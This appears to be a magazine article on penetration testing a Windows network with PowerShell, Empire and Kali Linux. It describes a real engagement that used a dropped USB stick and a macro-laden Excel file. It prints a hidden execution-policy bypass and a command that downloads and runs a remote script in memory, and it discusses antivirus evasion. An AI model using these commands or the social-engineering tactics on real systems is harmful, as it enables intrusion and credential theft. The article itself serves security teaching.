Pentesting with PowerShell in six steps
Abstract: The purpose of this article is to provide an overview of the application of penetration testing using Powershell. As such, the presentation is not overly technical in scope, but covers instead what penetration testing is, what benefits stakeholders in a secure system receive from a test, and how Powershell can used to conduce some steps of penetration testing. The presentation goes into an example procedure for penetration testing, explain some steps Reconnaissance, Scanning, Gaining Access, Maintaining Access, Covering Tracks and Reporting. These represent the steps that attackers use in common attacks. Finally, this presentation also briefly discusses some techniques involving non-conventional devices such as Smartphone bootable and the dangers of an unprepared team.
Keywords: Penetration Test. Powershell. Security. Attack. Reverse.
Security is one of the major issues of information systems. The growing connectivity of computers through the internet, the increasing extensibility of systems, and need in organizations have made software security a bigger problem. Pentesting is often employed by organizations as a mitigation strategy to reduce the risk of an attack on computer resources.
Pentest is used to find the security weakness of a system and exploit with legal approval, in order to manage the computer system more safely. Using either automated tools or manual method or a combination of both, a Pentester can be explain found issues.
Administrative Tools like as PowerShell they are most commonly used, especially in Windows environment. PowerShell is an command line tool, as WMI and VBScript used to interact with the operating system and related. Combining the use of Powershell with invasive techniques can obtain excellent results. This paper is targeted for a Windows majority
network with Active Directory in an organization with an immature security posture.
2.1 Penetration Testing
Defined as a multidisciplinary science, is a comprehensive method to test security, based in hardware, software e peoples, this process involves a deep analysis of the system for any potential vulnerabilities attempting to gain access to resources. In most common cases, obtain databases and other confidential information, are the focus of Penetration Tester. Penetration testing helps safeguard the organization, preventing financial loss, preserve corporate image, information security. This procedure, evaluates the effectiveness of existing security and provides the supporting arguments for future investment or upgrade of security technologies.
2.2 Procedures, techniques and tools
Some methods can be used to prepare a Penetration Test, for example PTES, OSSTMM, ISSAF (Information Systems Security Assessment Framework), OWASP, however six steps can be used essentially: Reconnaissance, Scanning, Gaining Access, Maintaining Access, Covering Tracks and Reporting.
Reconnaissance – is the act of gathering preliminary data or intelligence on your target, collect as much interesting information as possible. Can be actively (meaning that you are directly touching the target) or passively (meaning that your recon is being performed through an intermediary).
Scanning – can be use vulnerability scanner to gather information about target.
Gaining Access – requires taking control of one or more network devices in order to either extract data from the target, or to use that device to then launch attacks on other targets.
Maintaining Access – at this stage the attacker must remain hidden, a persistent connection must be maintained.
Covering Tracks – Here the attacker must remove all traces so that no one notices your presence and leave intact systems again.
Reporting – at this point it should be prepared the detailed report containing all the results at each stage.
Various techniques can be used to Pentest, the use of such techniques varies according some variants, the professional must recognize and analyze the organization to choose which techniques will use. Are present in most penetration testing some techniques like Sniffing, Reverse Shell, Social Engineering.
Sniffing – is used to appropriate valid TCP/IP network addresses by reading packets.
Social Engineering – this technique used to take advantage, hoodwink peoples using malicious links, e-mails, images and direct talks.
Reverse Shell – is a type of shell in which the target machine communicates back to the attacking machine.
A lot of tools can be used to prepare and execute a Pentest, however, the professional must choose the most appropriate tool. Wireshark and TCPDump are most commonly used to Sniff, SET (Social Engineering Toolkit) most used to Social Engineering technique and ICMPSH is a great tool to Reverse Shell.
Microsoft Company release PowerShell for system and network management, all windows based. Native to Windows this tool has become so popular with administrators, pentesters and hackers, because then it only has a script to run on various versions of the operating system.
On August 18, 2016, Microsoft Company announces that PowerShell is now open-source and can be run on Linux, initially with Ubuntu, CentOS and Red Hat and Mac OS version is compatible with OS X 10.11, and now Pentester can count on a wider range of possibilities.
This tool is really good, because able to call the Windows API, run commands in memory without writing to the disk, avoid detection by Anti-virus, already flagged as trusted by most application white list solutions and used to write many open source Pentest Toolkits.
The table below lists the usage of some basic commands to help you get started on PowerShell faster. Note that all bash commands should continue working on PowerShell session.
|ls||dir, Get-ChildItem||List files and folders|
|tree||dir -Recurse||List all files and folders|
|cd||cd, Set-Location||Change directory|
|pwd||pwd, $pwd, Get-Location||Show working directory|
|clear, Ctrl+L, reset||cls, clear||Clear screen|
|mkdir||New-Item -ItemType Directory||Create a new folder|
|touch test.txt||New-Item -Path test.txt||Create a new empty file|
|cat test1.txt test2.txt||Get-Content test1.txt, test2.txt||Display files contents|
|cp ./source.txt ./dest/dest.txt||Copy-Item source.txt dest/dest.txt||Copy a file|
|cp -r ./source ./dest||Copy-Item ./source ./dest -Recurse||Recursively copy from one folder to another|
|mv ./source.txt ./dest/dest.txt||Move-Item ./source.txt ./dest/dest.txt||Move a file to other folder|
|rm test.txt||Remove-Item test.txt||Delete a file|
|rm -r <folderName>||Remove-Item <folderName> -Recurse||Delete a folder|
|find -name build*||Get-ChildItem build* -Recurse||Find a file or folder starting with ‘build’|
|grep -Rin “sometext” –include=”*.cs”||Get-ChildItem -Recurse -Filter *.cs|
| Select-String -Pattern “sometext”
|Recursively case-insensitive search for text in files|
Font: https://github.com/PowerShell/PowerShell/tree/master/docs/learning-powershell. Accessed Nov 2, 2016.
This paper is divided into two parts, the first is the literature to improve the foundation on the subject, according Gil (2008) is made based on materials already developed and can be found in books and scientific papers. The next step is developed with help of qualitative research through practical tests.
Qualitative research method was used in this study, will be given by means of techniques Social Engineering and Reverse TCP Connection.
The analysis took place in a real network, the study object was Excel document and BAT (Batch File Scripting), as well as research order. This is a real case of Penetration Test however this paper was prepared only for educational purposes and all data have been changed to preserve the organization’s security.
For data analysis, it was necessary to address exploratory analysis and systematic data, using Social Engineering with Excel document and pen drive with autorun program to reverse connection, to audit persons, antivirus and firewall to vouch for its efficiency, using a bootable Smartphone Samsung Galaxy S4 to run Kali Linux, Empire Powershell to generate scripts.
Organization owner requests a PenTest, but only based on Windows Operation System, using only native tools, because Network Administrators need to use these scripts to test again and Powershell is common to they.
4.2 Penetration test execution
Following the six steps Reconnaissance, Scanning, Gaining Access, Maintaining Access, Covering Tracks and Reporting, using Powershell we’ll conduct the process.
In Reconnaissance step, the contractor has passed all information, all computers running Windows Operation System, Cisco Meraki Firewall and VPN bridge and Kaspersky Endpoint Antivirus. However, test antivirus efficiency, firewall and training of employees, are focus of this Pentest, as requested by organization owner.
Thus, running PSNMAP we can DNS, ports open, ping, like as NMAP tool. To install PSNMAP open Powershell and run Install-Module -Name PSnmap, with these parameters psnmap -Comp 192.168.0.1/24 -Dns -Port 23, 21, 445, 3389, 25, can get some information to second step Scanning. See, online computers and open ports demonstrate in image below.
Well, to Gaining Access step, we need knowledge about scripts execution polices. Pentester may have to bypass the restricted execution policy, with the Get-ExectionPolicy PowerShell is possible see the current configuration. To run silently in the background the batch file would look something like this powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file “name_of_script.ps1”.
Another option to bypass restriction is download script from the internet and execute it without having to write to disk using command like powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://short-link-to-script’)”, use unrestricted policy PowerShell.exe -ExecutionPolicy UnRestricted -File script-name.ps1.
Great scripts package are Empire, Nishang and Powersploit and was used to conduce this test.
Firstly create a server with Empire. Running Kali Linux on bootable Smartphone Samsung Galaxy S4 via Drivedroid. To this procedure was used a abandoned computer, but connected to the network yet, was told it would be to charge the device battery, then in command line was execute these commands: “listeners”, “set Name slx_petter” and “execute”.
In the sequence execute “usestager launcher slx_petter” and “execute”, gathering the result.
Using a Pendrive with autorun and Macro in Excel document, was successfully executed. Being that the autorun option was enabled and the pendrive was left in a strategic location, a person moved by curiosity picked up and placed on the computer. One excel file was prepared with financial data and another with collaborators’ contacts. The same person opened all files, ignoring the macro alert.
After, sent the collaborators’ contacts file to someone else, this person opened the file as well, ignoring alert. At this moment is possible interact with agent, can be seen below.
Above, some details of the infected system.
Finally, we can see to achieve this result the ease of access due to equipment configuration errors and security software and lack of proper training. It’s also possible to prove the efficiency of the attack with in memory commands, this technique helps to bypass most antivirus. At this moment, the attacker can use Mimikatz to request Hash’s in SMB Relay for example, Bypass UAC and many others attacks.
5 FINAL CONSIDERATIONS
Just as technology advances, cyber security professionals need to follow the techniques and know well the vulnerabilities of your organization. The advice of a good Pentester is essential to help identify gaps in Information Security.
It is very common for organizations work in the reaction, however, it is important to work preventively. As can be observed in the analysis, use of a native tool can facilitate Pentest, as could be observed in the analysis, the use of a native tool, can facilitate Pentest, and can use it as a single hacker tool, since Linux also supports Powershell, reducing the learning curve and making multiplataform Scripts.
Despite it being possible to run Powershell on other platforms, some features are restricted to the operating system, this means, some functions will not work and should be replaced by equivalent. However, the higher limit is the imagination barrier.
Some technical limits of professionals as well as the total lack of monitoring, provided the success of the attack. To monitor this type of threat is necessary to implement safety systems, such as SIEM, so even if it’s not possible to inhibit completely, you can trace and block the largest number of potential threats.
Empire Powershell. Available at: <https://www.powershellempire.com/?page_id=380>. Accessed: November 06, 2016.
GIL, Antonio Carlos. How to design research projects. 4. ed. São Paulo: Atlas, 2008.
LOPES, Petter Anderson. Pentest, definition and concepts. Available at: <http://periciacomputacional.com/pentest-seguranca-ofensiva/>. Accessed: November 09, 2016.
Port scan subnets with PSnmap for PowerShell. Available at: <http://www.powershelladmin.com/wiki/Port_scan_subnets_with_PSnmap_for_PowerShell/>. Accessed: November, 07, 2016.
Sutherland, Scott. 15 Ways to Bypass the PowerShell Execution Policy. Available at: <http://www.powershelladmin.com/wiki/Port_scan_subnets_with_PSnmap_for_PowerShell/>. Accessed: November, 07, 2016.
ABOUT THE AUTHOR: Petter Anderson Lopes
Authored article eForensics Magazine and PenTest Magazine.